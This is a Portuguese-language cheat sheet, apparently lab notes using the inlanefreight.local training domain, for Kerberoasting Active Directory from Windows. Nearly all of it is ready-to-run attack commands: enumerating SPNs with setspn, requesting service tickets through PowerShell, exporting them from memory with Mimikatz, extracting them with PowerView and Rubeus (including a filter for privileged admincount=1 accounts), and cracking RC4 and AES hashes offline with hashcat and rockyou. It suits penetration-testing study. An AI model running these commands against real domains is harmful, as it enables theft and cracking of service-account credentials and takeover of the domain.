Kerberoasting - from Windows

Enumerando SPNs com setspn.exe

setspn.exe -Q */*

Visando um único usuário

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"

Recuperando todos os tickets usando setspn.exe

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Extraindo Tickets da Memória com Mimikatz

mimikatz # base64 /out:true

mimikatz # kerberos::list /export

Preparando o Blob Base64 para Cracking

cho "<base64 blob>" |  tr -d \\n

Colocando a saída em um arquivo como .kirbi

cat encoded_file | base64 -d > sqldev.kirbi

Modificando crack_file para Hashcat

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

Quebrando o Hash com Hashcat

hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

Rota automatizada/baseada em ferramentas

Usando o PowerView para extrair tickets TGS

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname

Usando o PowerView para direcionar um usuário específico

Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

Exportando todos os tickets para um arquivo CSV

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation

Visualizando o conteúdo do arquivo .CSV

cat .\ilfreight_tgs.csv

Usando Rubeus

Usando o sinalizador /stats

.\Rubeus.exe kerberoast /stats

Usando o sinalizador /nowrap

.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

Quebrando o Ticket com Hashcat e rockyou.txt

hashcat -m 13100 rc4_to_crack /usr/share/wordlists/rockyou.txt

Verificando os tipos de criptografia suportados

Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes

Solicitando um novo bilhete

.\Rubeus.exe kerberoast /user:testspn /nowrap

Executando Hashcat e verificando o status do trabalho de cracking

hashcat -m 19700 aes_to_crack /usr/share/wordlists/rockyou.txt

PreviousKerberoasting - from Linux NextACL Enumeration

Last updated 7 months ago